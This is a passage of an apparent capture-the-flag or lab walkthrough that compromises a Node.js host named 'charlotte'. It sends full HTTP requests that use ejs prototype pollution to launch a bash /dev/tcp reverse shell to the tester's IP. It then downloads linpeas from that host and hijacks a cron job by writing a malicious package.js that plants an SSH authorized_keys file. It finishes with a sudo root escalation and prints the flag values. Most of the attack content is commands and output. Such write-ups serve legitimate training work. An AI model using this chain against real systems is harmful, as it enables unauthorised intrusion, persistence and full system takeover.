inet 192.168.45.243/24 scope global tun0

valid_lft forever preferred_lft forever

inet6 fe80::16c4:7f54:1da6:daf8/64 scope link stable-privacy proto kernel_ll

valid_lft forever preferred_lft forever

## set up a listener on the port used in the payload (80)

nc -lvnp 80

listening on [any] 80 ...

We follow this guide (https://www.cve.news/cve-2024-33883/) to escalate the prototype pollution to RCE:



Now, go to this URL (http://192.168.105.184:8000/), intercept the request using BURP and send it to the Repeater tab. Make sure it’s a POST request to /change_status and that the Content-Type header is set to application/json. Use the request below as an example; it turns the shields value into an object, which gives us an entry to pollute.

POST /change_status HTTP/1.1

Host: 192.168.105.184:8000

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Authorization: Basic VW5kZWFkRGluZ29HcnVtYmxpbmczNjk6U2hvcnR5U2tpbmxlc3NUcnVzdGVlNDU2

Connection: keep-alive

Upgrade-Insecure-Requests: 1

Priority: u=0, i

Content-Type: application/json

Content-Length: 48

{

"shields": {

"hekk": 1

}

}



Now, click on Send. After that, send the request below, which uses prototype pollution to set the outputFunctionName option to our RCE payload.

POST /change_status HTTP/1.1

Host: 192.168.105.184:8000

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Authorization: Basic VW5kZWFkRGluZ29HcnVtYmxpbmczNjk6U2hvcnR5U2tpbmxlc3NUcnVzdGVlNDU2

Connection: keep-alive

Upgrade-Insecure-Requests: 1

Priority: u=0, i

Content-Type: application/json

Content-Length: 229

{

"shields": {

"__proto__": {

"outputFunctionName":

"x;console.log(1);process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/192.168.45.243/80 0>&1\"');x"

}

}

}

Once we refresh the page in the browser (http://192.168.105.184:8000/), the ejs template is rendered again, our payload runs and we catch the reverse shell.

## catch the reverse shell

nc -lvnp 80

listening on [any] 80 ...

connect to [192.168.45.243] from (UNKNOWN) [192.168.105.184] 50822

bash: cannot set terminal process group (901): Inappropriate ioctl for device

bash: no job control in this shell

www-data@charlotte:/$

## find `local.txt` on the filesystem

www-data@charlotte:/$ find / -iname 'local.txt' 2>/dev/null

/home/sebastian/local.txt

## print `local.txt`

www-data@charlotte:/$ cat /home/sebastian/local.txt

b479f6abe2e24ac4fb8bfb9b9ade8454

Lateral Movement #

Now, upload linpeas.sh to the target and run it.

## change directory locally

cd uploads

## download latest version of linpeas.sh

wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh

## get local IP address on tun0

ip a | grep -A 10 tun0

5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500

link/none

inet 192.168.45.243/24 scope global tun0

valid_lft forever preferred_lft forever

inet6 fe80::16c4:7f54:1da6:daf8/64 scope link stable-privacy proto kernel_ll

valid_lft forever preferred_lft forever

## start local webserver

python3 -m http.server 80

## on target

## change directory

www-data@charlotte:/$ cd /var/tmp

www-data@charlotte:/var/tmp$

## download `linpeas.sh`

www-data@charlotte:/var/tmp$ wget http://192.168.45.243/linpeas.sh

--2025-09-06 10:59:57-- http://192.168.45.243/linpeas.sh

Connecting to 192.168.45.243:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 961834 (939K) [text/x-sh]

Saving to: ‘linpeas.sh’

linpeas.sh 100%[=============================================================================================================>] 939.29K 5.84MB/s in 0.2s

2025-09-06 10:59:57 (5.84 MB/s) - ‘linpeas.sh’ saved [961834/961834]

## set the execution bit

www-data@charlotte:/var/tmp$ chmod +x linpeas.sh

## run `linpeas.sh`

www-data@charlotte:/var/tmp$ ./linpeas.sh

The linpeas.sh output shows a cronjob that runs /home/sebastian/audit.js every minute as the sebastian user. In this audit.js file, we can see that it loads a module without a file extension: require("/var/www/node/package");.

## print crontab

www-data@charlotte:/home/sebastian$ cat /etc/crontab

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command

17 * * * * root cd / && run-parts --report /etc/cron.hourly

25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )

47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )

52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

#

* * * * * sebastian /home/sebastian/audit.js

## change directory

www-data@charlotte:/var/tmp$ cd /home/sebastian/

www-data@charlotte:/home/sebastian$

## list content directory `/home/sebastian`

www-data@charlotte:/home/sebastian$ ls -la

total 44

drwxr-xr-x 5 sebastian sebastian 4096 Sep 6 07:07 .

drwxr-xr-x 3 root root 4096 Feb 16 2022 ..

-rwxr-xr-x 1 sebastian sebastian 641 Jan 15 2022 audit.js

lrwxrwxrwx 1 sebastian sebastian 9 Feb 16 2022 .bash_history -> /dev/null

-rw-r--r-- 1 sebastian sebastian 220 Apr 4 2018 .bash_logout

-rw-r--r-- 1 sebastian sebastian 3771 Apr 4 2018 .bashrc

drwx------ 2 sebastian sebastian 4096 Sep 6 07:07 .cache

drwx------ 3 sebastian sebastian 4096 Sep 6 07:07 .gnupg

-rw-r--r-- 1 sebastian sebastian 33 Sep 6 04:11 local.txt

drwxr-xr-x 95 sebastian sebastian 4096 Feb 16 2022 node_modules

-rw------- 1 sebastian sebastian 67 Jan 11 2022 package.json

-rw-r--r-- 1 sebastian sebastian 807 Apr 4 2018 .profile

## print `audit.js`

www-data@charlotte:/home/sebastian$ cat audit.js

#!/usr/bin/env node

const regFetch = require('npm-registry-fetch');

const fs = require('fs')

const auditData = require("/var/www/node/package");

let opts = {

"color":true,

"json":true,

"unicode":true,

method: 'POST',

gzip: true,

body: auditData

};

return regFetch('/-/npm/v1/security/audits', opts)

.then(res => {

return res.json();

})

.then(res => {

fs.writeFile('/var/www/node/audit.json', JSON.stringify(res, "", 3), (err) => {

if (err) { console.log('Error: ' + err) }

else { console.log('Audit data saved to /var/www/node/audit.json') }

});

})

## list content of `/var/www/node/`

www-data@charlotte:/home/sebastian$ ls -la /var/www/node/

total 36

drwxr-xr-x 4 www-data www-data 4096 Feb 16 2022 .

drwxr-xr-x 7 www-data www-data 4096 Sep 6 11:07 ..

-rw-r--r-- 1 www-data www-data 552 Nov 25 2021 ._index.js

-rw-r--r-- 1 www-data www-data 1450 Nov 25 2021 index.js

drwxr-xr-x 70 www-data www-data 4096 Feb 16 2022 node_modules

-rw-r--r-- 1 www-data www-data 552 Jan 11 2022 ._package.json

-rw-r--r-- 1 www-data www-data 141 Jan 11 2022 package.json

drwxr-xr-x 2 www-data www-data 4096 Jan 30 2022 templates

-rwxr-xr-x 1 www-data www-data 552 Jan 30 2022 ._templates

On this URL: https://nodejs.org/api/modules.html#folders-as-modules, we read the following:

If the exact filename is not found, then Node.js will attempt to load the required filename with the added extensions: `.js`, `.json`, and finally `.node`. When loading a file that has a different extension (e.g. `.cjs`), its full name must be passed to `require()`, including its file extension (e.g. `require('./file.cjs')`).

`.json` files are parsed as JSON text files, `.node` files are interpreted as compiled addon modules loaded with `process.dlopen()`. Files using any other extension (or no extension at all) are parsed as JavaScript text files.

So, what if we move the current package.json out of the way and add our own package.js, which copies a public SSH key to the /home/sebastian/.ssh directory (this directory also needs to be created)? Because the cronjob runs as sebastian, this gives us the opportunity to move laterally to the sebastian user via SSH.
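The extension lookup quoted from the Node.js documentation can be tried safely in a temporary directory. This is a minimal sketch in which the directory name and file contents are made up for the illustration; it places a `package.json` and a `package.js` side by side and requires the path without an extension.

```javascript
const fs = require("fs");
const os = require("os");
const path = require("path");

// Scratch directory standing in for /var/www/node.
const dir = fs.mkdtempSync(path.join(os.tmpdir(), "require-demo-"));

// A harmless JSON file and a JavaScript file with the same base name.
fs.writeFileSync(path.join(dir, "package.json"), JSON.stringify({ source: "json" }));
fs.writeFileSync(path.join(dir, "package.js"), 'module.exports = { source: "js" };\n');

// Same style of call as in audit.js: an absolute path without extension.
const loaded = require(path.join(dir, "package"));
console.log(loaded.source); // js

// Remove the scratch directory again.
fs.rmSync(dir, { recursive: true, force: true });
```

Since `.js` is tried before `.json`, the JavaScript file is the one that gets executed here even though both files exist, which suggests that moving package.json aside is a precaution rather than a strict requirement.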

## change directory

cd files

## get the local IP address on tun0

ip a | grep -A 10 tun0

5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500

link/none

inet 192.168.45.243/24 scope global tun0

valid_lft forever preferred_lft forever

inet6 fe80::16c4:7f54:1da6:daf8/64 scope link stable-privacy proto kernel_ll

valid_lft forever preferred_lft forever

## run ssh-keygen to generate a key pair, quiet mode, blank password and named key pair `sebastian.key`

ssh-keygen -q -N '' -f sebastian.key

## change `sebastian.key.pub` to `authorized_keys`

mv sebastian.key.pub authorized_keys

## start local webserver

python3 -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

## on target:

## change directory

www-data@charlotte:~/node$ cd /var/tmp/

www-data@charlotte:/var/tmp$

## download `authorized_keys`

www-data@charlotte:/var/tmp$ wget http://192.168.45.243/authorized_keys

--2025-09-06 13:24:20-- http://192.168.45.243/authorized_keys

Connecting to 192.168.45.243:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 91 [application/octet-stream]

Saving to: ‘authorized_keys’

authorized_keys 100%[=============================================================================================================>] 91 --.-KB/s in 0s

2025-09-06 13:24:20 (25.1 MB/s) - ‘authorized_keys’ saved [91/91]

## move the current `package.json` to `pack.bak`

www-data@charlotte:~/node$ mv package.json pack.bak

## create the `package.js` file, making a `.ssh` directory and copying `authorized_keys` in it

www-data@charlotte:/var/tmp$ echo "require('child_process').exec('mkdir /home/sebastian/.ssh && cp /var/tmp/authorized_keys /home/sebastian/.ssh/authorized_keys')" > /var/www/node/package.js

## verify `authorized_keys` is in the `.ssh` directory

www-data@charlotte:/var/tmp$ ls -la /home/sebastian/.ssh/

total 12

drwxrwxr-x 2 sebastian sebastian 4096 Sep 6 13:16 .

drwxr-xr-x 6 sebastian sebastian 4096 Sep 6 13:16 ..

-rwxrwxr-x 1 sebastian sebastian 91 Sep 6 13:16 authorized_keys

## use the SSH private key to access the target as `sebastian` via SSH

ssh -i sebastian.key sebastian@$ip

Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-167-generic x86_64)

* Documentation: https://help.ubuntu.com

* Management: https://landscape.canonical.com

* Support: https://ubuntu.com/advantage

System information as of Sat Sep 6 13:19:24 EDT 2025

System load: 0.0 Processes: 199

Usage of /: 30.2% of 15.68GB Users logged in: 0

Memory usage: 64% IP address for ens192: 192.168.105.184

Swap usage: 1%

0 updates can be applied immediately.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sat Sep 6 13:13:02 2025 from 192.168.45.243

$ bash

sebastian@charlotte:~$

Privilege Escalation #

Checking the sudo privileges as the sebastian user, we can run anything with sudo, so let’s run bash and escalate our privileges to the root user.

## print sudo privileges

sebastian@charlotte:~$ sudo -l

Matching Defaults entries for sebastian on charlotte:

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sebastian may run the following commands on charlotte:

(ALL : ALL) ALL

(ALL) NOPASSWD: ALL

## escalate privileges using sudo and `bash`

sebastian@charlotte:~$ sudo bash -p

root@charlotte:~#

## print `proof.txt`

root@charlotte:~# cat /root/proof.txt

1497aff2b66718f5e803c0d2e34abcf5

References #

[+] https://security.snyk.io/vuln/SNYK-JS-MERGE-1042987

[+] https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh

[+] https://nodejs.org/api/modules.html#folders-as-modules